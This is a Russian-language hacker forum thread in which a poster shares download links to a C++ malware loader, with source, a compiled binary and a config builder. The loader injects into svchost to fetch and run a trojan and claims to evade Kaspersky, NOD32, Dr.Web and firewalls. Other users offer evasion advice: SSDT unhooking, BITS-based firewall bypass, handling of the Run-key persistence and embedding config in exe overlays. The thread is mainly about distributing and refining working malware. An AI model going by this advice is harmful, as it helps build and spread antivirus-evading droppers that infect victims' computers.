Loader от меня
 

Решил написать лоадер. Просто выдрал из bloodknife`а всё ненужное. :D
Так значит:
1)Вес не пакованый 4кб.
2)Каспер, нод, др.веб в ауте.
3)Инжект в svchost - фаеры молчат.

На С++. Правите конфиг и юзаете. Естесн с исходниками.

Внимание! Адептами програминга перед просмотром сороцев положить валидол под язык! ;)

http://lordofring.tushino.com/LOADER.rar
http://rapidshare.com/files/39634411/LOADER.rar.html
http://softz.ifolder.ru/2507458

Ухх открываем сорсы и начинаем готовить мат :)

*Сердечный приступ*

Ну фто ж, начнём =)
Метод инжекта не очень оригинальный. Но а вдруг выбранная тобой база уже занята? Тогда ведь песец ослику (С) =( Так что было бы неплохо добавить релоки и их обработку на всякий пожарный.
Насчет добавления в автозапуск - ну эээ я например комп неделями не перезагружаю.. имхо все же лучше запускать троя сразу. Хотя это на вкус и цвет.. но тогда придется подождать завершения скачивания через WaitForSingleObject на объекте созданного в другом процессе потока

Далее, а ты уверен, что URLMON.DLL окажется в адресном пространстве жертвы? Я - нет. Поэтому было бы неплохо вначало func() дописать LoadLibrary("urlmon.dll"); а то есть риск вылететь с Access Violation ;)

Ну а вообще кода там не очень много, про сотню строчек больше сказать, вообщем-то и нечего :)
Разве что стиль отвратительный =) Ну ладно )

инжекст в свхост? и какие фаеры молчат, "огласите весь список пожалуйста" (с)
называть вещи надо своимим именами, молчать будет, по-моему, тока
виндовый фаер))) и пара таких же "псевдо" фаеров...

у мну НОД реагирует:) мож че то не так делаю... и согласен, что в хвост вставлять не стоит фаер по коннекту среагирует...
угу а изменение реестра нод не палит да?...

Гы-гы svchost меняет реестр! Ужс! :D :D :D

Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.

Смотря какой код возьмешь) Самый лучший вариант через нтсистемдебагконтрол, если достанешь, конечно)

Вот, критику учёл. Вес 11кб(непакованый), чистка sdt , др.веб уже в теме...
Заливать на разные файловики не стал - вес всего 7кб.

http://lordofring.tushino.com/LOADERv.1.1.rar

Откуда взял такой кривой код восстановления Sdt ?)

rootkit.com

а можно откомпиленный вариант для тестов? =)

lordofring.tushino.com/_LOADER.exe

мдаааааааааааа ...первый вопрос - под чем ты это писал?

я вот просто не понимаю, ну на*** такие потики создавать? типа вот я написал лоадер. традиционный (91ого года) метод инжекта. Традиционная скачка файлов. Вот и весь лоадер. Поставьте мне плюсики, я крутой кодер. Ну я сам тоже могу написать тебе ДДОС бота какого-нибудь очередного, со стандартным набором ф-ий. Это не кодинг а рисование - переклеивание чужих кусков кода в свои файлы.
А что код у тебя вообще в .h это пиздец конечно.

Что ты имеешь в виду?

+ я не просил;)
На ачате я не видел исходников работающего лоадера. А если и выкладывают какой-нить лоадер(без исходников), то это полное г. на которое фаеры и антивири кричат как коты на валерьянку. А тут те работающий пример + исходники.
Согласен, что инжект палёвый, но я ведь добавил восстановление sdt.

ну и какой код из своего лоадера ты сам писал?

.h - header file (заголовочный файл)
Код правильнее хранить в .cpp-файлах.

Народ! Могу сказать только одно: критикуя - предлагай!!! Вон берите пример с греата, он небось немало подсказок дал.

понимаешь ли в чем дело.
Во-первых, у тебя как бы антивирусы молчат, но это если скачивать нормальный файл.
Потому траффик, который ты получишь через
палится IMONом нод.

Во-вторых, твой уникальнейший ключ реестра Current Version\Run, как и все подобные RunOnce и т.п. палятся anti-spyware аутпоста, глазами юзера да и кто знает чем ещё.

В третьих, неясно что значит строка
и зачем там нужен if, если потом стоит ;

В четвертых, ZoneAlarm не даст тебе снять хуки sdt. Не даст загрузить драйвер или открыть секцию PHYSICAL MEMORY.
причем, как я понял, это у тебя просто выдрано откуда-то с 99 года сорца, и засунуто в .h файл.

В пятых, не понятно зачем тебе строки
да и вообще все остальные.

В шестых, нет никакого смысла в том что ты выложил. Лоадер он на то и лоадер. Что должен не палится. Должен непалевно скачивать файлы. Должен весить очень мало.
Должен не использовать всякие чужие нестабильные ring0-переходы через колгейт. И не должен, наконец, быть собраным из чужих кусков сорцом.
А вообще никаких претензий быть не может, просто тебе было скучно и нечего делать. Я это так понял.
Причем, ладно бы если ты это написал на осенблере.
Типа понтанулся бы)
Как снег когда то понтанулся, выложив bindshell-исходник)
А на c++ уже все остальные нубы умеют((
Этим народ не удивишь.

Alexsize, я не критикую, просто я не могу понять что именно в этом лоадере было написано им, по мне так это обычный копипаст с других исходников с небольшими авторскими поправками

Ты в теме? Ну так выложи свой лоадер! Что ж тогда критиковать вообще? Вот я считаю себя в праве что либо критиковать только если я в этом разбираюсь.

To KEZ

Всю эту работу выполняет svchost. Что будет кричать нод?:))))

Ну а смысл? В паблике сейчас 2 наиболее распространенных метода обхода файрволла, это инжект с предварительным снятием хуков и обход через BITS сервис, в сети куча исходников лоадеров, юзающих эти методы. Я не запрещаю автору использовать эти технологии в своих работах, но если уж он выложил "очередной" лоадер с инжектом пусть готовится к критике.

Сделать билдер оказалось проще, чем я думал.:)))

+Добавлен билдер.
На размер билдера не смотрите - borland C++


http://rapidshare.com/files/41584071/configur_loader.rar.html

Да хоть папа римский. Создание ключа в ветке Run заемтно 100%.

Это на случай, если либ в адресном пространстве не окажется

у тебя не билдер, а конфигуратор, не путай ;)

ммм... тру .. конфигуратор..
Кста есть у кого экзамплы билдера на c++

кста.. а можн ли было б засунуть .dat
в рессурсы .. и там его конфигурировть?

p.s а даж если не получиться сконфигурировать с рессурсов..
то можно было б всунуть в temp и от туда конф-ть

Вот сорцы конфигуратора.
http://rapidshare.com/files/41505646/builder_sources_.rar.html

Берем exe и в оверлеи пишем конфиг.

Я спросил экзампл... а не рассказать как это сделать

А что тут такогО? CreateFile / CreateFileMapping / MapViewOfFile / пишем / UnmapViewOfFile / CloseHandle x2

Если ты привык получать все в готовом варианте, то уж извини, наврятли кто выложит тебе исходники нормального билдера.

Я не просил выкладывать ОХЕРЕННЫЙ билдер...
а просил показать небольшой пример...

P.S Great ... ок получилось..

Нах CreateFileMapping / MapViewOfFile ? Открываем файл, читаем содержимое в буфер, заменяем в буфере то, что нам надо, пишем в новый файл.

Ну пусть делает как ему больше нравится. Мне больше нравится мапировать, т.к. это более аккуратно, прозрачно и винда меньше обращает внимания.